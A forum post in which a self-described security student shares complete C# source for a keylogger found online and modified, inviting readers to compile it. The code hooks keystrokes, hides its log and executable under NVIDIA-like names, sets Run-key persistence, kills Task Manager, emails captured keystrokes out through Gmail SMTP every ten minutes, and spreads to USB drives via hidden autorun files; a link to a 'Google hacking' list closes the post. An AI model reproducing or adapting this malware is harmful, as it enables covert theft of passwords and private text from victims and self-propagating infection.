Hello, I will start off by stating that I am a first year network security student. I am new to the world, and give my respects to those who know more than I do. I however have been playing around with computers for quite some time. I prefer scripting languages among other things simply because they are the easiest things in the world to use. I would not even consider batch to be a powerful tool outside of being able to automate other 3rd party command line utilities and such. I prefer Perl as my weapon of chose, however over the years I have developed some scripts for generating ip addresses and running output against things like nmap and sysinternals utilities for gathering information. I would like to share some of my toys, but thought it would be best to first ask if anyone would even have an interest in seeing some of these things. I guess if someone says yeah go ahead post, then I shall do so. Regards, Cleptography -
I should probably rename this thread to various codes or something. I will add various source code and scripts from as many languages as I can, along with automating command utilities. This first code is a key logger written in c#, with ability to email and attach itself to usb. I can not take full credit for this as I found it online so creds to the original author. It has been a while so I'm not quite sure where I dug the source up from or I would post a link to it as well. I modified it a bit, but you get the general idea. It's not compiled, you can use the c# compiler included with windows service pack or whatever compiler you so desire, but here is the source. KeyLogger written in c# --------------------------- Code: using System; using System.Diagnostics; using System.Timers; using System.Windows.Forms; using System.Runtime.InteropServices; using System.IO; using System.Net; using System.Net.Mail; using Microsoft.Win32; namespace Keylogger_V2 { class Program { private const int WH_KEYBOARD_LL = 13; private const int WM_KEYDOWN = 0x0100; private static LowLevelKeyboardProc _proc = HookCallback; private static IntPtr _hookID = IntPtr.Zero; public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log"); public static byte caps = 0, shift = 0, failed = 0; [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); public static void Main() { _hookID = SetHook(_proc); Program.startup(); System.Timers.Timer timer; timer = new System.Timers.Timer(); timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent); timer.AutoReset = true; timer.Interval = 600000; timer.Start(); System.Timers.Timer timer2; timer2 = new System.Timers.Timer(); timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread); timer2.AutoReset = true; timer2.Interval = 10000; timer2.Start(); Application.Run(); GC.KeepAlive(timer); GC.KeepAlive(timer2); UnhookWindowsHookEx(_hookID); } public static void startup() { //Try to copy keylogger in some folders string source = Application.ExecutablePath.ToString(); string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); destination=System.IO.Path.Combine(destination,"nvdisp.exe"); try { System.IO.File.Copy(source, destination,false); source = destination; } catch { Console.WriteLine("No authorization to copy file or other error."); } //Find if the file already exist in startup try { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false); if (registryKey.GetValue("Nvidia driver") == null) { registryKey.SetValue("Nvidia driver", destination); } registryKey.Close();//dispose of the Key } catch { Console.WriteLine("Error setting startup reg key."); } //Try to add to all users try { RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false); if (registryKey.GetValue("Nvidia driver") == null) { registryKey.SetValue("Nvidia driver", source); } registryKey.Close();//dispose of the key } catch { Console.WriteLine("Error setting startup reg key for all users."); } } public static void OnTimedEvent(object source, EventArgs e) { Process[] ProcessList = Process.GetProcesses(); foreach (Process proc in ProcessList) { if (proc.MainWindowTitle.Contains("Taskmgr.exe")) { proc.Kill(); } } System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message msg.To.Add("username@gmail.com"); msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8); msg.Subject = "i don't know"; msg.SubjectEncoding = System.Text.Encoding.UTF8; msg.Body = "ciao ale"; msg.BodyEncoding = System.Text.Encoding.UTF8; msg.IsBodyHtml = false; msg.Priority = MailPriority.High; SmtpClient client = new SmtpClient(); //Network Credentials for Gmail client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password"); client.Port = 587; client.Host = "smtp.gmail.com"; client.EnableSsl = true; Attachment data = new Attachment(Program.path); msg.Attachments.Add(data); try { client.Send(msg); failed = 0; } catch { data.Dispose(); failed = 1; } data.Dispose(); if (failed == 0) File.WriteAllText(Program.path, ""); //empties the file failed = 0; } private static IntPtr SetHook(LowLevelKeyboardProc proc) { using (Process curProcess = Process.GetCurrentProcess()) using (ProcessModule curModule = curProcess.MainModule) { return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0); } } private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam); private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) { StreamWriter sw = File.AppendText(Program.path); int vkCode = Marshal.ReadInt32(lParam); if (Keys.Shift == Control.ModifierKeys) Program.shift = 1; switch ((Keys)vkCode) { case Keys.Space: sw.Write(" "); break; case Keys.Return: sw.WriteLine(""); break; case Keys.Back: sw.Write("back"); break; case Keys.Tab: sw.Write("TAB"); break; case Keys.D0: if (Program.shift == 0) sw.Write("0"); else sw.Write(")"); break; case Keys.D1: if (Program.shift == 0) sw.Write("1"); else sw.Write("!"); break; case Keys.D2: if (Program.shift == 0) sw.Write("2"); else sw.Write("@"); break; case Keys.D3: if (Program.shift == 0) sw.Write("3"); else sw.Write("#"); break; case Keys.D4: if (Program.shift == 0) sw.Write("4"); else sw.Write("$"); break; case Keys.D5: if (Program.shift == 0) sw.Write("5"); else sw.Write("%"); break; case Keys.D6: if (Program.shift == 0) sw.Write("6"); else sw.Write("^"); break; case Keys.D7: if (Program.shift == 0) sw.Write("7"); else sw.Write("&"); break; case Keys.D8: if (Program.shift == 0) sw.Write("8"); else sw.Write("*"); break; case Keys.D9: if (Program.shift == 0) sw.Write("9"); else sw.Write("("); break; case Keys.LShiftKey: case Keys.RShiftKey: case Keys.LControlKey: case Keys.RControlKey: case Keys.LMenu: case Keys.RMenu: case Keys.LWin: case Keys.RWin: case Keys.Apps: sw.Write(""); break; case Keys.OemQuestion: if (Program.shift == 0) sw.Write("/"); else sw.Write("?"); break; case Keys.OemOpenBrackets: if (Program.shift == 0) sw.Write("["); else sw.Write("{"); break; case Keys.OemCloseBrackets: if (Program.shift == 0) sw.Write("]"); else sw.Write("}"); break; case Keys.Oem1: if (Program.shift == 0) sw.Write(";"); else sw.Write(":"); break; case Keys.Oem7: if (Program.shift == 0) sw.Write("'"); else sw.Write('"'); break; case Keys.Oemcomma: if (Program.shift == 0) sw.Write(","); else sw.Write("<"); break; case Keys.OemPeriod: if (Program.shift == 0) sw.Write("."); else sw.Write(">"); break; case Keys.OemMinus: if (Program.shift == 0) sw.Write("-"); else sw.Write("_"); break; case Keys.Oemplus: if (Program.shift == 0) sw.Write("="); else sw.Write("+"); break; case Keys.Oemtilde: if (Program.shift == 0) sw.Write("`"); else sw.Write("~"); break; case Keys.Oem5: sw.Write("|"); break; case Keys.Capital: if (Program.caps == 0) Program.caps = 1; else Program.caps = 0; break; default: if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower()); if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper()); if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper()); if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower()); break; } Program.shift = 0; sw.Close(); } return CallNextHookEx(_hookID, nCode, wParam, lParam); } public static void USBSpread(object source, EventArgs e) { /////////////////////////////////////////////////////////////// /////////////////////// USB spread class ////////////////////// /////////////////////////////////////////////////////////////// //A bit modified string source2 = Application.ExecutablePath.ToString(); System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives(); try { foreach (System.IO.DriveInfo drive in drives) { if (drive.DriveType == DriveType.Removable) { string driveAutorun = drive.Name + "autorun.inf"; StreamWriter sw = new StreamWriter(driveAutorun); sw.WriteLine("[autorun]\n"); sw.WriteLine("open=start.exe"); sw.WriteLine("action=Run VMCLite"); sw.Close(); File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden); try { File.Copy(source2, drive.Name + "start.exe", true); File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden); } finally { Console.WriteLine("Removable device rooted"); } } } } catch (Exception e2) { Console.WriteLine(e2.ToString()); } } } }
Googles Master list a place for all your google hacking fun. it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302